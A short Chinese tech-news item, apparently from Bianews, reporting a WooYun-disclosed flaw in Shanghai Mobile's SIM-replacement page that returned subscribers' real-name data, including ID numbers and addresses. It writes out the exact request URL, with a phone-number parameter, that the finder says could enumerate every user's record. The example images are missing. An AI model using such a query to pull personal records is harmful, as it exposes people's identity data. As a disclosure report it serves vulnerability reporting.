上海移动所有用户实名制信息可任意查询

鞭牛士 • 9年前扫码分享

我是创始人李岩：很抱歉！给自己产品做个广告，点击进来看看。

Bianews报道 乌云漏洞平台披露，通过漏洞，上海移动所有用户实名制信息可任意查询（包括身份证号，居住地址等）。目前，已经转由CNCERT向中国移动集团公司通报，由其后续协调网站管理部门通报。

以下是漏洞泄露信息过程：

上海移动，换卡不换号

http://www.sh.10086.cn/shop/app?service=page/base.OrderBackUpCard&listener=initPage

需要验证实名制身份证信息，抓包，发现如下POST请求：
http://www.sh.10086.cn/shop/app?service=ajaxDirect/1/base.OrderBackUpCard/base.OrderBackUpCard/javascript/undefined&pagename=base.OrderBackUpCard&eventname=checkBackUpCardLimit&partids=undefined&ajaxSubmitType=post

用户登记的信息竟然直接返回。

利用URL：http://www.sh.10086.cn/shop/app?service=ajaxDirect/1/base.OrderBackUpCard/base.OrderBackUpCard/javascript/undefined&pagename=base.OrderBackUpCard&eventname=checkBackUpCardLimit&partids=undefined&ajaxSubmitType=post&edit_MANAGENUMBER=手机号

可遍历全市用户实名制信息。
例1：

例2：

点到为止，不再遍历。

漏洞证明：

例1：

例2：